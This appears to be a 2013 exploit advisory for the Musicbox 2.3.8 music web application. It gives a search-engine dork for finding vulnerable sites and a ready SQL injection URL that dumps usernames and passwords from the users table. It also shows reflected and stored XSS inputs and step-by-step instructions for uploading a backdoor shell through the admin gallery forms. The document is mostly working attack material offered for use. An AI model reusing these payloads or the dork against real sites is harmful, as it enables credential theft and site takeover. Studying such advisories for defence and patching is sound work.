Musicbox 2.3.8 Cross Site Scripting & Shell Upload & SQL Injection

2013.08.27
Credit: DevilScreaM
Risk: High
Local: No
Remote: Yes
CVE: N/A

#Exploit Title : Musicbox 2.3.8 Multiple Vulnerabilities
#Author : DevilScreaM
#Date : 25/08/2013
#Category : Web Applications
#Vendor : http://www.musicboxv2.com/
#Version : 1.0 - 2.3.8
#Dork intext:Musicbox Version intext:Musicbox Version 2.3.8 ? 2008 inurl:genre_albums.php?id=
#Vulnerability : SQL Injection Vulnerability, XSS Vulnerability, Shell Upload Vulnerability
#Tested On : Windows 7 32 Bit (Mozilla & Chrome)
#Greetz : Newbie-Security.or.id

SQL Injection Vulnerability

http://site-target/genre_albums.php?id=[SQLI]

Example

http://site-target/genre_albums.php?id=-3+UNION SELECT 1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10+from+users--

==========================================================================================

Cross site scripting / XSS Vulnerability

*Search

1. Go To Feature Search
2. Input your Cross Site Scripting, Example "<h1>Tested by DevilScreaM</h1>" , Click Search
3. See Result

or See with URL

http://site-target/index.php?in=song&term=[Cross site scripting/XSS]&action=search&start=0

Example

http://site-target/index.php?in=song&term=<h1>Tested by DevilScreaM</h1>&action=search&start=0

==========================================================================================

*News Profile

1. Register To Website or go to link http://site-target/register.php
2. Login to Website
3. Go to Menu [ My News ]
4. At News Heading input your XSS, Example <h1>Tested by DevilScreaM</h1>
   And at Details input your XSS or Text

See your XSS at

http://site-target/member.php?uname=[YOUR_USERNAME]

Example

http://server/musicbox/member.php?uname=devilscream

==========================================================================================

Shell Upload Vulnerability

*Artist Gallery

1. Go to Admin Page, And Login
2. Go to Upload Artist Image or Go to Link http://site-target/admin/adminpanel.php?action=artistgallery
3. Select Your Shell/Backdoor , And Click Submit
4. Result Upload At http://site-target/artist_gallery/Your_Backdoor.php

==========================================================================================

*Album Gallery

1. Go to Admin Page, And Login
2. Go to Upload Album Image or Go to Link http://site-target/admin/adminpanel.php?action=albumgallery
3. Select Option, Example Option "All Album", And Click Submit
4. Select Your Shell/Backdoor , And Click Submit
5. Result Upload At http://site-target/album_gallery/Your_Backdoor.php

==========================================================================================

